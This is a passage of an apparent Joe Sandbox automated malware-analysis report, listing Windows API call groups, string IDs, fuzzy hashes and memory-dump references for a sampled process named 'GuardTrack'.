                                                          • _wcscpy.LIBCMT ref: 0061E44B
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0061E48A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                          • String ID: *.*
                                                          • API String ID: 3566783562-438819550
                                                          • Opcode ID: 223d348d10e96aef6e8407166f226ced988195507b01773763a314746161a7c5
                                                          • Instruction ID: fa4dc5204fdc13c53538c12222b3b792c07147bb1363ce46126a9a0df261a65c
                                                          • Opcode Fuzzy Hash: 223d348d10e96aef6e8407166f226ced988195507b01773763a314746161a7c5
                                                          • Instruction Fuzzy Hash: E5615B755046069FC710EF64C844ADEB7E9BF89310F04891EF98987251DB36EA45CB92
                                                          APIs
                                                            • Part of subcall function 005B1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,005B2412,?,00000000,?,?,?,?,005B1AA7,00000000,?), ref: 005B1F76
                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 005B24AF
                                                          • KillTimer.USER32(-00000001,?,?,?,?,005B1AA7,00000000,?,?,005B1EBE,?,?), ref: 005B254A
                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 005EBFE7
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005B1AA7,00000000,?,?,005B1EBE,?,?), ref: 005EC018
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005B1AA7,00000000,?,?,005B1EBE,?,?), ref: 005EC02F
                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,005B1AA7,00000000,?,?,005B1EBE,?,?), ref: 005EC04B
                                                          • DeleteObject.GDI32(00000000), ref: 005EC05D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                          • String ID: hd
                                                          • API String ID: 641708696-580410754
                                                          • Opcode ID: 686345e1e0085a364e0b72158a04f0f4b24b69ba6c8e8abc0bde01dcdd64c542
                                                          • Instruction ID: 88bf1809864eb64046b2e9708c68769c3d98df2d2770c730182599fdc4dbd8d2
                                                          • Opcode Fuzzy Hash: 686345e1e0085a364e0b72158a04f0f4b24b69ba6c8e8abc0bde01dcdd64c542
                                                          • Instruction Fuzzy Hash: A961AA31114711DFEB399F15C94CB6A7FB2FB41312F10A92CE49A4AAA0C771B891DFA1
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0061A2C2
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0061A2E3
                                                          • __swprintf.LIBCMT ref: 0061A33C
                                                          • __swprintf.LIBCMT ref: 0061A355
                                                          • _wprintf.LIBCMT ref: 0061A3FC
                                                          • _wprintf.LIBCMT ref: 0061A41A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 311963372-3080491070
                                                          • Opcode ID: 9953f0faf65748226a73f241baa17b7bf5da46c23d9c365f18af183248ff394e
                                                          • Instruction ID: ceb5c0e3eb81f32f6b8d814bd5f27e10fb8f13bade781b5f7654e9a2bbb7c970
                                                          • Opcode Fuzzy Hash: 9953f0faf65748226a73f241baa17b7bf5da46c23d9c365f18af183248ff394e
                                                          • Instruction Fuzzy Hash: 0051D03180051AAECF14EBE0CD4AEEEBBBABF45340F100129F505B2162DB716F99DB51
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,005FF8B8,00000001,0000138C,00000001,00000001,00000001,?,00623FF9,00000001), ref: 0061009A
                                                          • LoadStringW.USER32(00000000,?,005FF8B8,00000001), ref: 006100A3
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                          • GetModuleHandleW.KERNEL32(00000000,00677310,?,00000FFF,?,?,005FF8B8,00000001,0000138C,00000001,00000001,00000001,?,00623FF9,00000001,00000001), ref: 006100C5
                                                          • LoadStringW.USER32(00000000,?,005FF8B8,00000001), ref: 006100C8
                                                          • __swprintf.LIBCMT ref: 00610118
                                                          • __swprintf.LIBCMT ref: 00610129
                                                          • _wprintf.LIBCMT ref: 006101D2
                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006101E9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                          • API String ID: 984253442-2268648507
                                                          • Opcode ID: 01d643d42b635811e50966e1bc3fe6569e4069f13b6d74f3cbeaff8fee97aba8
                                                          • Instruction ID: 004d0e1a70c871be3b7ae5e3c6879a27f979027c0b6f9cc874edb26682afc797
                                                          • Opcode Fuzzy Hash: 01d643d42b635811e50966e1bc3fe6569e4069f13b6d74f3cbeaff8fee97aba8
                                                          • Instruction Fuzzy Hash: 0A41937280051AAEDF14EBE0CD4AEEE7B79FF55340F100129F505B2092DA756F49CBA5
                                                          APIs
                                                            • Part of subcall function 005B4D37: __itow.LIBCMT ref: 005B4D62
                                                            • Part of subcall function 005B4D37: __swprintf.LIBCMT ref: 005B4DAC
                                                          • CharLowerBuffW.USER32(?,?), ref: 0061AA0E
                                                          • GetDriveTypeW.KERNEL32 ref: 0061AA5B
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0061AAA3
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0061AADA
                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0061AB08
                                                            • Part of subcall function 005C1821: _memmove.LIBCMT ref: 005C185B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                          • API String ID: 2698844021-4113822522
                                                          • Opcode ID: 5a26adc579e007e0eed650f74f38a797c9904a83de1ca545d1233cccf488fd07
                                                          • Instruction ID: 940f29338b87cd342a396cbbc7651b2913e8e138ad47aea81212990e93b8bf10
                                                          • Opcode Fuzzy Hash: 5a26adc579e007e0eed650f74f38a797c9904a83de1ca545d1233cccf488fd07
                                                          • Instruction Fuzzy Hash: EF517C711046069FC300EF60C985DAABBF6FF99358F14492DF885972A2DB31ED05CB92
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0061A852
                                                          • __swprintf.LIBCMT ref: 0061A874
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0061A8B1
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0061A8D6
                                                          • _memset.LIBCMT ref: 0061A8F5
                                                          • _wcsncpy.LIBCMT ref: 0061A931
                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0061A966
                                                          • CloseHandle.KERNEL32(00000000), ref: 0061A971
                                                          • RemoveDirectoryW.KERNEL32(?), ref: 0061A97A
                                                          • CloseHandle.KERNEL32(00000000), ref: 0061A984
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                          • String ID: :$\$\??\%s
                                                          • API String ID: 2733774712-3457252023
                                                          • Opcode ID: 8680d8e2e6180b1733ebc478efe72829a20cda1d0ac60b14f23f39fdcb6cab47
                                                          • Instruction ID: 21ea82aa5da48288f8ed263b8784cb2d49e19b45021a30cde0cc5f16d277bb31
                                                          • Opcode Fuzzy Hash: 8680d8e2e6180b1733ebc478efe72829a20cda1d0ac60b14f23f39fdcb6cab47
                                                          • Instruction Fuzzy Hash: 5E31C37551011AABDB219FE4DC48FEB77BEEF89700F1441B6F608D21A0E77097848B25
                                                          APIs
                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0063982C,?,?), ref: 0063C0C8
                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C0DF
                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C0EA
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C0F7
                                                          • GlobalLock.KERNEL32(00000000,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C100
                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C10F
                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C118
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C11F
                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0063982C,?,?,00000000,?), ref: 0063C130
                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00643C7C,?), ref: 0063C149
                                                          • GlobalFree.KERNEL32(00000000), ref: 0063C159
                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0063C17D
                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0063C1A8
                                                          • DeleteObject.GDI32(00000000), ref: 0063C1D0
                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0063C1E6
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                          • String ID:
                                                          • API String ID: 3840717409-0
                                                          • Opcode ID: eb2445478d9ae87c9c1c908864c439d85624a8c1e76a0f3251ec88529ce7ee95
                                                          • Instruction ID: 09107184f04db1f099fbbeca8e9d82c62c90403535135d8e37355426a40d79ca
                                                          • Opcode Fuzzy Hash: eb2445478d9ae87c9c1c908864c439d85624a8c1e76a0f3251ec88529ce7ee95
                                                          • Instruction Fuzzy Hash: 46414C75500214EFDB219FA4DC4CEAB7BBAEF8A721F104058FA05E7260D7719941DBA0
                                                          APIs
                                                          • __wsplitpath.LIBCMT ref: 0061E053
                                                          • _wcscat.LIBCMT ref: 0061E06B
                                                          • _wcscat.LIBCMT ref: 0061E07D
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0061E092
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0061E0A6
                                                          • GetFileAttributesW.KERNEL32(?), ref: 0061E0BE
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 0061E0D8
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0061E0EA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                          • String ID: *.*
                                                          • API String ID: 34673085-438819550
                                                          • Opcode ID: ccc712d74aec666bf6c4a8f5649cb04d7b590c6966bc368de3115d9d29a18b41
                                                          • Instruction ID: e5a78cddd380e354fdfd8af6693497efdb2ec5ad2d5bb66344510ec6ebc35a95
                                                          • Opcode Fuzzy Hash: ccc712d74aec666bf6c4a8f5649cb04d7b590c6966bc368de3115d9d29a18b41
                                                          • Instruction Fuzzy Hash: EF8183715042419FC724DF64C8459EAB7EABF99310F188C2EF886C7351E735EA86CB52
                                                          APIs
                                                            • Part of subcall function 005B29E2: GetWindowLongW.USER32(?,000000EB), ref: 005B29F3
                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0063C8A4
                                                          • GetFocus.USER32 ref: 0063C8B4
                                                          • GetDlgCtrlID.USER32(00000000), ref: 0063C8BF
                                                          • _memset.LIBCMT ref: 0063C9EA
                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0063CA15
                                                          • GetMenuItemCount.USER32(?), ref: 0063CA35
                                                          • GetMenuItemID.USER32(?,00000000), ref: 0063CA48
                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0063CA7C
                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0063CAC4
                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0063CAFC
                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0063CB31
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                          • String ID: 0
                                                          • API String ID: 1296962147-4108050209
                                                          • Opcode ID: b7be90252f38496c4ac4c6e921585f4493b9cf1862cc9353397190751dbc7803
                                                          • Instruction ID: 022ec8a168b3aa09ae31d01605d93fa131d8c51a05637eeff2c5b318e2ba8874
                                                          • Opcode Fuzzy Hash: b7be90252f38496c4ac4c6e921585f4493b9cf1862cc9353397190751dbc7803
                                                          • Instruction Fuzzy Hash: 61817C716083159FD714CF14C985AABBBEAFF89364F00492EF999A3391C730D905CBA2
                                                          APIs
                                                            • Part of subcall function 00608E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00608E3C
                                                            • Part of subcall function 00608E20: GetLastError.KERNEL32(?,00608900,?,?,?), ref: 00608E46
                                                            • Part of subcall function 00608E20: GetProcessHeap.KERNEL32(00000008,?,?,00608900,?,?,?), ref: 00608E55
                                                            • Part of subcall function 00608E20: HeapAlloc.KERNEL32(00000000,?,00608900,?,?,?), ref: 00608E5C
                                                            • Part of subcall function 00608E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00608E73
                                                            • Part of subcall function 00608EBD: GetProcessHeap.KERNEL32(00000008,00608916,00000000,00000000,?,00608916,?), ref: 00608EC9
                                                            • Part of subcall function 00608EBD: HeapAlloc.KERNEL32(00000000,?,00608916,?), ref: 00608ED0
                                                            • Part of subcall function 00608EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00608916,?), ref: 00608EE1
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00608B2E
                                                          • _memset.LIBCMT ref: 00608B43
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00608B62
                                                          • GetLengthSid.ADVAPI32(?), ref: 00608B73
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00608BB0
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00608BCC
                                                          • GetLengthSid.ADVAPI32(?), ref: 00608BE9
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00608BF8
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00608BFF
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00608C20
                                                          • CopySid.ADVAPI32(00000000), ref: 00608C27
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00608C58
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00608C7E
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00608C92
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: 6b04ecb4e0b7ef8f02cfd77725b11121aaac060f2abe8d644d34c9ba8634a7db
                                                          • Instruction ID: 2ab852e8d4288e2916908881b0c2539dce59f7b45bd902d30d06edfb799ef5e8
                                                          • Opcode Fuzzy Hash: 6b04ecb4e0b7ef8f02cfd77725b11121aaac060f2abe8d644d34c9ba8634a7db
                                                          • Instruction Fuzzy Hash: B8617B75940219EFEF14DFA0DC48EEEBB7AFF05304F048169EA95A7290DB709A00CB60
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 00627A79
                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00627A85
                                                          • CreateCompatibleDC.GDI32(?), ref: 00627A91
                                                          • SelectObject.GDI32(00000000,?), ref: 00627A9E
                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00627AF2
                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00627B2E
                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00627B52
                                                          • SelectObject.GDI32(00000006,?), ref: 00627B5A
                                                          • DeleteObject.GDI32(?), ref: 00627B63
                                                          • DeleteDC.GDI32(00000006), ref: 00627B6A
                                                          • ReleaseDC.USER32(00000000,?), ref: 00627B75
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                          • String ID: (
                                                          • API String ID: 2598888154-3887548279
                                                          • Opcode ID: 7e633b75ae2a9deeb0297d2d47fe832119eeb283189147cafaa3372040f42f78
                                                          • Instruction ID: 55db624f31a04d8b034634aab23992fb60060d91542e4e413084d5261e4e65c7
                                                          • Opcode Fuzzy Hash: 7e633b75ae2a9deeb0297d2d47fe832119eeb283189147cafaa3372040f42f78
                                                          • Instruction Fuzzy Hash: C5517B75904619EFDB14CFA8DC84EAEBBBAEF49710F14841DFA4AA7210C731A9418F60
                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0061A4D4
                                                            • Part of subcall function 005C1A36: _memmove.LIBCMT ref: 005C1A77
                                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 0061A4F6
                                                          • __swprintf.LIBCMT ref: 0061A54F
                                                          • __swprintf.LIBCMT ref: 0061A568
                                                          • _wprintf.LIBCMT ref: 0061A61E
                                                          • _wprintf.LIBCMT ref: 0061A63C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000013.00000002.2086620699.00000000005B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 005B0000, based on PE: true
                                                          • Associated: 00000013.00000002.2086601826.00000000005B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000640000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086673659.0000000000666000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086724166.0000000000670000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000013.00000002.2086756286.0000000000679000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_19_2_5b0000_GuardTrack.jbxd
                                                          Similarity
                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 311963372-2391861430
                                                          • Opcode ID: 425e34abc2b759e8888d8d0b315ac8c2a42be5277326cd7d7711bc96c5111c59
                                                          • Instruction ID: cbf4ec29fc5bdddef3eb78e1d3b484cbdcf38fa5cd0b739711e5fd84ef0dbdac
                                                          • Opcode Fuzzy Hash: 425e34abc2b759e8888d8d0b315ac8c2a42be5277326cd7d7711bc96c5111c59
                                                          • Instruction Fuzzy Hash: 6451C07180111AAECF14EBE0CD4AEEEBB7ABF45340F140129F505B21A2DB316F89DB95
                                                          APIs
                                                            • Part of subcall function 0061951A: __time64.LIBCMT ref: 00619524
                                                            • Part of subcall function 005C4A8C: _fseek.LIBCMT ref: 005C4AA4
                                                          • __wsplitpath.LIBCMT ref: 006197EF
                                                            • Part of subcall function 005D431E: __wsplitpath_helper.LIBCMT ref: 005D435E
                                                          • _wcscpy.LIBCMT ref: 00619802
                                                          • _wcscat.LIBCMT ref: 00619815
                                                          • __wsplitpath.LIBCMT ref: 0061983A
                                                          • _wcscat.LIBCMT ref: 00619850
                                                          • _wcscat.LIBCMT ref: 00619863
                                                            • Part of subcall function 00619560: _memmove.LIBCMT ref: 00619599
                                                            • Part of subcall function 00619560: _memmove.LIBCMT ref: 006195A8
                                                          • _wcscmp.LIBCMT ref: 006197AA
                                                            • Part of subcall function 00619CF1: _wcscmp.LIBCMT ref: 00619DE1
                                                            • Part of subcall function 00619CF1: _wcscmp.LIBCMT ref: 00619DF4
                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00619A0D
                                                          • _wcsncpy.LIBCMT ref: 00619A80
